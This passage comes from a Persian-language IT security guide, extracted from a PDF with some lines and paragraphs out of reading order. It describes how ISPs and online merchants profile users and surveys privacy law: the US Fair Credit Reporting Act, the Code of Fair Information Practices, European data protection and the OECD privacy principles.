ﻧﻈﺎﺭﺕ ﻛﻨﺪ ،ﺍﻣـﺎ ﻫﻮﺷـﻴﺎﺭﻱ ﻭ ﻣﺮﺍﻗﺒـﺖ ﺧـﻮﺩ ﺭﺍ ﻧﻴـﺰ ﺍﺯ ﺩﺳـﺖ
ﻧﺪﻫﻴﺪ :ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﻗـﺐ ﺑﺎﺷـﻴﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺧﻮﺩ ﺭﺍ ﻗﻮﻳﺘﺮ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﺎﻧﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﭘﻴﭽﻴﺪﻩﺗـﺮ ﻣـﻲﺷـﻮﻧﺪ،
ﻣﺪﺍﻓﻌﻴﻦ ﻭ ﻛﺴﺎﻧﻴﻜﻪ ﻣﺴﺘﻌﺪ ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﺮﻗـﻲ
ﻭ ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ.
١٧٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﻫﺸﺘﻢ
ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ،
ﺗﺪﻭﻳﻦ ﺁﻳﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ،
ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ISPﻫﺎ ﺑﮕﺬﺭﺩISP .ﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺏ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﻭ ﺣﺘﻲ ﻣﻘﺎﻻﺗﻲ ﻛﻪ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭ ﹺ
ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻩﺍﻧــﺪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﻫﻨــﺪ .ﺁﻧﻬــﺎ ﺣﺘــﻲ
ﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺑـﺮ ﺣـﺴﺐ ﻛﻠﻤـﺎﺕ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ
ﻛﻠﻴﺪﻱ ﺑﻜﺎﺭﺭﻓﺘﻪ ﺩﺭ ﻣﺘﻦ ﺁﻧﻬـﺎ ﺗﺤﻠﻴـﻞ ﻧﻤﺎﻳﻨـﺪ .ﺑـﺎ ﺭﺩﮔﻴـﺮﻱ ﻭ
ﻼ ﺁﻳـﺎ
ﺗﺤﻠﻴﻞ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ،ﻳﻚ ISPﻣﻲﺗﻮﺍﻧﺪ ﺑﮕﻮﻳﺪ ﻛﻪ ﻣـﺜ ﹰ
ﻛﺎﺭﺑﺮﺍﻧﺶ ﺑﻪ ﺳﻔﺮ ﺑﺎ ﻗـﺎﻳﻖ ﻋﻼﻗﻤﻨـﺪ ﻫـﺴﺘﻨﺪ ﻳـﺎ ﺑـﻪ ﺳـﻔﺮ ﺑـﺎ
ﺍﺗﻮﻣﺒﻴﻞ؛ ﺑﻪ ﻣﺪ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﺧﻴﺮ؛ ﻭ ﺁﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺩﺭﻣـﺎﻥ
ﺑﻴﻤﺎﺭﻱ ﺧﺎﺻﻲ ﻋﻼﻗﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﻧﻪ.
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﻛﻠﻴﺎﺕ
ﺭﻭﺍﺑﻂ ﺗﺠﺎﺭﺕ ﻭ ﻣﺸﺘﺮﻱ ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺑﺎﺯﺭﮔﺎﻧﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑﺪﺳـﺖ
ﻣﻲﺁﻭﺭﻧﺪ .ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺵ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣـﻲﺩﺍﻧـﺪ ﺷـﻤﺎ ﺩﺭﺣـﺎﻝ
ﺑﺮﺭﺳﻲ ﻛﺪﺍﻡ ﻣﺤﺼﻮﻝ ﻫـﺴﺘﻴﺪ؛ ﻛـﺪﺍﻡ ﻣﺤـﺼﻮﻝ ﺭﺍ ﺑـﻪ ﻛـﺎﺭﺕ
ﺧﺮﻳﺪ ﺧﻮﺩ ﻣﻲﺍﻓﺰﺍﻳﻴﺪ ﺍﻣﺎ ﭘﺲ ﺍﺯ ﻣﺪﺗﻲ ﺣﺬﻑ ﻣﻲﻛﻨﻴﺪ؛ ﻭ ﻛـﺪﺍﻡ
ﻣﺤــﺼﻮﻝ ﺭﺍ ﻧﻬﺎﻳﺘـﹰﺎ ﺑــﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻣــﻲﺧﺮﻳــﺪ .ﺑﺎﺯﺭﮔﺎﻧــﺎﻥ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺩﺍﻧﻨﺪ ﻫﻨﮕﺎﻡ ﺧﺮﻳﺪ ﺩﺭ ﺧﺎﻧﻪ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ
ﺳ ﹺﺮ ﻛﺎﺭ ،ﻭ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺑﺎﻗﻴﻤﺎﻧـﺪﺓ ﺍﻋﺘﺒـﺎﺭ ﻛـﺎﺭﺕ
ﺧﺮﻳﺪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻄﻠـﻊ ﺷـﻮﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﺮﺧﻼﻑ ﺩﻧﻴـﺎﻱ
ﻏﻴﺮﺍﻳﻨﺘﺮﻧﺘﻲ ،ﻳﻚ ﺑﺎﺯﺭﮔﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺳﺎﺑﻘﺔ ﺧﺮﻳـﺪ
ﻭ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺷﻤﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭ ﺑـﺎ
ﺑﺮﻗﺮﺍﺭﻱ ﭼﻨﻴﻦ ﺭﻭﺍﺑﻄﻲ ﻣﻴﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻃﻴﻒ ﻭﺳﻴﻌﻲ ﺍﺯ
ﻣﺸﺘﺮﻳﺎﻥ ،ﺑﻪ ﻳﻜﺴﺮﻱ ﺍﻟﮕﻮﻫﺎﻱ ﺍﺭﺯﺷﻤﻨﺪ ﺭﻓﺘﺎﺭﻱ ﭘﻲ ﺑﺒﺮﺩ.
ISPﻫــﺎ ﻗﺎﺩﺭﻧــﺪ ﺍﺯ ﺍﻳــﻦ ﻫــﻢ ﺑﻴــﺸﺘﺮ ﺩﺭ ﻣــﻮﺭﺩ ﻣــﺸﺘﺮﻱ ﺧــﻮﺩ
ﺍﻃﻼﻋﺎﺕ ﻛﺴﺐ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺮﺁﻧﭽﻪ ﻛﺎﺭﺑ ﹺﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣـﻲﺑﻴﻨـﺪ
115 Cyberspace
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺣﻘﻮﻕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﻗـﺎﻧﻮﻥ
ﮔﺰﺍﺭﺵ ﺍﻋﺘﺒﺎﺭ ﺑﺎﺯﺍﺭ) ١١٦ﻣﺼﻮﺏ ﺳﺎﻝ (۱۹۷۰ﺻﺮﺍﺣﺘﹰﺎ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ
ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺣﻘﻮﻕ ﺍﺳﺎﺳﻲ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﺭﺍ ﺑـﻪ
ﺭﺳﻤﻴﺖ ﻣﻲﺷﻨﺎﺧﺖ؛ ﺣﻘﻮﻗﻲ ﭼﻮﻥ ﺣـﻖ ﻣﻼﺣﻈـﺔ ﮔﺰﺍﺭﺷـﻬﺎﻱ
ﺍﻋﺘﺒﺎﺭﻱ ﻫﺮ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺗﻮﺳﻂ ﺧﻮﺩ ﺍﻭ ،ﺣﻖ ﺍﻃـﻼﻉ ﺍﺯ ﺍﻳﻨﻜـﻪ
ﭼﻪ ﻛﺴﺎﻧﻲ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻭﻱ ﺭﺍ ﻣـﻲﺑﻴﻨﻨـﺪ ،ﺣـﻖ ﺍﻟـﺰﺍﻡ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﻬﻴﻪﻛﻨﻨﺪﺓ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻪ ﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺍﺷـﺘﺒﺎﻫﺎﺕ
ﻛﺸﻒﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ،ﻭ ﺣﻖ ﺍﻟـﺰﺍﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ
ﺍﺿﺎﻓﻪﻛﺮﺩﻥ ﻳﻚ ﺍﻇﻬﺎﺭﻳﻪ ﺍﺯ ﻃـﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﮔﺰﺍﺭﺷـﻬﺎﻱ
ﻣــﻮﺭﺩ ﻣﻨﺎﻗــﺸﻪ .ﺩﺭ ﺳــﺎﻝ - ۱۹۷۳ﺩﺭ ﺩﻭﺭﻩﺍﻱ ﻛــﻪ ﺩﺍﺩﻩﻫــﺎﻱ
ﺷﺨﺼﻲ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ -ﺑـﺮﺍﻱ
ﺍﺣﻘﺎﻕ ﺣﻘﻮﻕ ﻣﺼﺮﻑ ﻛﻨﻨﺪﻩ ،ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﺑﺎﺯﺍﺭ ١١٧ﺍﺑﻼﻍ ﺷﺪ.
ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ
١١٨
ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ ﺑﺮ ﭘﻨﺞ ﺍﺻﻞ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ:
•
ﻖ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳـﺪ
ﻱ ﺳﻮﺍﺑ ﹺ
ﻫﻴﭻ ﺳﻴﺴﺘ ﹺﻢ ﻧﮕﻬﺪﺍﺭ ﹺ
ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
116 Fair Credit Reporting Act
117 Code of Fair Information Practices
۱۱۸ﻣﻨﺒﻊ :ﻭﺯﺍﺭﺕ ﺑﻬﺪﺍﺷﺖ ،ﺁﻣﻮﺯﺵ ﻭ ﺭﻓﺎﻩ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺍﻳــﻦ ﻓــﺼﻞ ﻣــﺮﻭﺭﻱ ﺧــﻮﺍﻫﻴﻢ ﺩﺍﺷــﺖ ﺑــﺮ ﻧﺤــﻮﺓ ﺗــﺪﻭﻳﻦ
ﻲ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻭ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻋﻤـﻮﻣ ﹺ
ﺩﻭﻟﺘﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ .ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺧـﻮﺍﻫﻴﻢ ﺩﻳـﺪ ﺍﺯ
ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻛﻮﺩﻛـﺎﻥ ﺍﺯ
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻣﻄﺎﻟﺐ ﻏﻴﺮﺍﺧﻼﻗـﻲ .ﺩﺭ ﺑﺨـﺶ
١١٥
ﭼﻬﺎﺭﻡ ﺑﺤﺚ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﻣﻄﺮﺡ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺗﺄﻛﻴﺪ ﻣﺎ ﺑﻴﺸﺘﺮ ﺭﻭﻱ ﻣﺴﺌﻮﻟﻴﺖ
ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻓﻀﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺳﺖ.
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﺑﻪ ﺗﺠـﺎﺭﺕ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﺩﺭ
ﺭﺍﺑﻄﻪ ﺑﺎ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﻜـﺎﻥ ﺗـﺸﺨﻴﺺ ﻫﻮﻳـﺖ ﻭ
ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣـﻲﺁﻭﺭﺩ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ
ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ؟
١٧٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺍﻃـﻼﻉ
ﭘﻴﺪﺍ ﻛﻨﺪ ﻛﻪ ﭼﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﻣﻲﺷﻮﺩ
ﻭ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ.
•
ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ
ﺑﻜﺎﺭ ﺭﻓﺘﻦ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺩﺭ ﺍﻫـﺪﺍﻓﻲ ﻏﻴـﺮ ﺍﺯ
ﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﺷﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ.
•
ﺑﺮﺍﻱ ﺧﻮﺩ ﻓﺮﺩ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﺻـﻼﺡ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ ﺍﻭ
ﻛﻪ ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﻭﻱ ﻣﻲﺷﻮﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
•
ﻫﺮ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺭﺍ
ﺗﻬﻴﻪ ،ﻧﮕﻬﺪﺍﺭﻱ ،ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﭘﺨﺶ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ
ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺩﻩ ﻫﺎ ﺩﺭ
ﻛﺎﺭﺑﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺗـﻀﻤﻴﻦ ﻧﻤﺎﻳـﺪ ﻭ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ.
ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻪ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ
ﺷﺨﺼﻲ ﺭﺍ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻣﻲﻛـﺮﺩ ﺍﺩﺍﻣـﻪ ﺩﺍﺩ .ﺑـﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ،
ﻦ
ﺳﻮﺍﺑﻖ ﺑﺎﻧﻜﻲ ،ﺳﻮﺍﺑﻖ ﺗﻠﻔﻦ ،ﺳﻮﺍﺑﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﺳﻮﺍﺑﻖ ﻣـﺸﺘﺮﻛﻴ ﹺ
ﺗﻠﻮﻳﺰﻳﻮﻥ ﻛﺎﺑﻠﻲ ،ﺳﻮﺍﺑﻖ ﺑﻬﺪﺍﺷـﺘﻲ ،ﺳـﻮﺍﺑﻖ ﺗﺤـﺼﻴﻠﻲ ﻭ ﺣﺘـﻲ
ﺳﻮﺍﺑﻖ ﺍﺟﺎﺭﺓ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳـﺪﺋﻮﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺗﺤـﺖ ﭘﻮﺷـﺶ
ﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭﺁﻣﺪﻧﺪ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﻫـﺮ ﺟـﺰﺀ
ﻗﺎﻧﻮﻥ ﻛﻨﮕﺮﻩﺍ ﹺ
ﻗﺎﻧﻮﻥ ﺣﻔﺎﻇﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺍﻳﺠـﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺗﻮﺳـﻂ ﺑﺨـﺶ
ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻧﻴﺮﻭﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺟﺮﺍﺋﻢ ﻣﺜـﻞ
ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣﺔ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣـﺸﺘﺮﻛﻴﻦ ﺗﻠﻔـﻦ ﻭ
ﺩﻭﺭﻧﮕﺎﺭ ١١٩ﻣﻲﮔﻨﺠﺪ ،ﺑﺪﻭﻥ ﺷـﻜﺎﻳﺖ ﺷـﺎﻛﻲ ﺧـﺼﻮﺻﻲ ﻗﺎﺑـﻞ
ﭘﻴﮕﺮﺩ ﻧﺒﻮﺩﻧﺪ .ﺍﻣﺎ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺎﺋﻞ ﻃﻮﺭ ﺩﻳﮕـﺮﻱ ﺑـﻮﺩ .ﺑـﺮ ﭘﺎﻳـﺔ
ﺗﺠﺮﺑــﺔ ﺟﻨــﮓ ﺩﻭﻡ ﺟﻬــﺎﻧﻲ ﻛــﻪ ﺩﺭ ﺁﻥ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ
ﺷﺨﺼﻲ ﺗﻮﺳﻂ ﻧﺎﺯﻳﻬﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ ،ﺑﻴـﺸﺘﺮ
ﺩﻭﻝ ﺍﺭﻭﭘﺎﻳﻲ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻧﺪ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ
ﻛﺮﺩﻥ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺍﺭﻭﭘﺎﻳﻴﺎﻥ ﺍﻳﺪﻩﻫﺎﻱ ﻣﻄﺮﺡ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﺑﺎﺯﺍﺭ ﺭﺍ ﺑﻪ ﻳﻚ ﻧﻈﺎ ﹺﻡ ﻛﻠﻲ ﻣﻮﺳﻮﻡ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ١٢٠ﺗﻌﻤـﻴﻢ
ﺩﺍﺩﻧﺪ.
119 Antijunk-Fax Telephone Consumer Privacy
Act
120 Data Protection
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ
ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ
ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﻪ ﺍﻗﺘـﺼﺎﺩﻱ ) ١٢١(OECDﺩﺭ ﺳـﺎﻝ
۱۹۸۰ﻳﻚ ﺭﺷﺘﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺖ ﻭ
ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ
ﺿﻮﺍﺑﻂ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﻄﻮﺭ ﺧـﺎﺹ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ
ﺑﻮﺩﻧﺪ ﺗﺎ ﺑﻪ ﻣـﺸﻜﻼﺕ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﺟﺮﻳـﺎﻥ ﻓﺮﺍﻣـﺮﺯﻱ ﺩﺍﺩﻩﻫـﺎ -
ﺣﺮﻛﺖ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺭ
ﺁﻥ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﻪ ﻛـﺸﻮﺭﻱ ﺩﻳﮕـﺮ ﻛـﻪ
ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺩﺭ ﺁﻥ ﺍﺯ ﺣﻔﺎﻇـﺖ ﻛﻤﺘـﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ -
ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ OECDﺩﺭ ﻣــﻮﺭﺩ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺮﻳﻢ
ﺧﺼﻮﺻﻲ ﻭ ﺟﺮﻳﺎﻥ ﻓﺮﺍﻣﺮﺯﻱ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻫـﺸﺖ ﺍﺻـﻞ ﺗـﺸﻜﻴﻞ
ﺷﺪﻩ ﺍﺳﺖ:
ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺟﻤﻊﺁﻭﺭﻱ
١٢٢
ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻭﺟﻮﺩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻫﺮ ﺩﺍﺩﺓ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ
ﻗــﺎﻧﻮﻧﻲ ﻭ ﻣﻨــﺼﻔﺎﻧﻪ ،ﺩﺭ ﺷــﺮﺍﻳﻂ ﺩﺭﺳــﺖ ،ﻭ ﺑــﺎ ﺩﺍﻧــﺶ ﻭ
ﺭﺿﺎﻳﺖ ﻓﺮﺩﻱ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺍﻭ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﺩ ﺑﺪﺳﺖ
